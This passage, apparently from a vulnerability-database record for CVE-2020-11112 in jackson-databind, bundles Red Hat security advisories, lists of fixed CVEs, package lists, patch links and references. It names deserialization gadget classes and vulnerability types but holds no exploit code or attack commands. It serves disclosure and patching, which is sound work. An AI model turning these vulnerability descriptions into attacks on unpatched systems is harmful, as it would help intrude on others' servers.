patch from the customer portal. See\nthe download link in the References section. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rh-maven35-jackson-databind security update\nAdvisory ID: RHSA-2020:1523-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:1523\nIssue date: 2020-04-21\nCross references: 1822587 1822174 1822932 1822937 1822927\nCVE Names: CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 \n CVE-2020-11112 CVE-2020-11113 \n=====================================================================\n\n1. Summary:\n\nAn update for rh-maven35-jackson-databind is now available for Red Hat\nSoftware Collections. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch\n\n3. Description:\n\nThe jackson-databind package provides general data-binding functionality\nfor Jackson, which works on top of Jackson core streaming API. \n\nSecurity Fix(es):\n\n* jackson-databind: Serialization gadgets in\norg.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)\n\n* jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n(CVE-2020-10969)\n\n* jackson-databind: Serialization gadgets in\norg.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)\n\n* jackson-databind: Serialization gadgets in\norg.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)\n\n* jackson-databind: Serialization gadgets in\norg.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.src.rpm\n\nnoarch:\nrh-maven35-jackson-databind-2.7.6-2.9.el7.noarch.rpm\nrh-maven35-jackson-databind-javadoc-2.7.6-2.9.el7.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11111\nhttps://access.redhat.com/security/cve/CVE-2020-11112\nhttps://access.redhat.com/security/cve/CVE-2020-11113\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXp7oOtzjgjWX9erEAQghsBAAk6mN7QOctoM4gV9BDkYybnwjFrgzSgQg\nLahdpBV7QmHQ/6rdhSlbE8sGCdrUwLJy1GvRS1PzvUY2IzLf8c0rtzcHrIiD1wWB\nN5kEBWiNgHOpuU4etwbR9gGsY7hhSvyxzTyRhHU36UQJqyNoc95DfbokqeAf8Ggp\ndfw20J8hsCkQ6OkvDCM6T9fY7jcbHdiD4jx8WSMn3bQS3o8zRf1JJlMPOqLnHM+J\n998+RIzoJYqqdL7XNWPMopvR1yps2Xx+NTL4+2Vg8e+2KVxO+ksIu3EqRsCRD0wT\n22iPNX3r8ETjWcfLGw0Imvc8RiRsCL7L4oa+cbIpnBdvsRr/yW8IYmvJmHwFTZlK\n+vIyYPAfSCLuHSktXEwZ9WDMeFsJfZr+zdVZ5MmOgvMAIqg+0RSE3VBlzmuAOMbv\nyNz6SPODozvMDPmW1OwLhtGsu1CigORIuTRcNSYwTkXVoAxFhWXK0sHuxc3h1ne0\nx38Tgk1grF7xbBSfvJwFn0MfBhufg4+iUuFhte7mtuSu3gvjQ/qt01Oo11p8cW2m\ng6lX1NGEsUpEONf0NS+1hFSxWB4ex7ln98e5AqNWtLHt3S5OHzI67+/4dgl5xF7J\nPdLv4j8b1AqTV8wRX6pK59OeslYcPhYdMWHEbMSkQJ3WZFOILkyTm6HWer9kl3Yt\n8yoMyLl6FBM=\n=n1if\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11112"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
},
{
"db": "VULHUB",
"id": "VHN-163658"
},
{
"db": "VULMON",
"id": "CVE-2020-11112"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11112",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "160601",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157322",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.1399",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1368",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1882",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48043",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2020-21475",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163658",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11112",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157859",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163658"
},
{
"db": "VULMON",
"id": "CVE-2020-11112"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
},
{
"db": "NVD",
"id": "CVE-2020-11112"
}
]
},
"id": "VAR-202003-1786",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163658"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:01:33.867000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Block one more gadget type (apache/commons-proxy, CVE-2020-11112) #2666",
"trust": 0.8,
"url": "https://github.com/FasterXML/jackson-databind/issues/2666"
},
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115370"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.4.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205625 - Security Advisory"
},
{
"title": "Red Hat: Important: rh-maven35-jackson-databind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201523 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 19 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202333 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple Security Vulnerabilities in Jackson-Databind Affect IBM Sterling B2B Integrator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9bb4efe27af18414a7db703d1dd40070"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/PalindromeLabs/Java-Deserialization-CVEs "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11112"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1736"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163658"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003616"
},
{
"db": "NVD",
"id": "CVE-2020-11112"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2666"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11112"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.7,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1882/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1368/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4471/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-denial-of-service-via-apache-commons-proxy-rmiprovider-serialization-gadgets-typing-32064"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48043"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157322/red-hat-security-advisory-2020-1523-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160601/red-hat-security-advisory-2020-5625-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1399/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:5625"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/palindromelabs/java-deserialization-cves"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
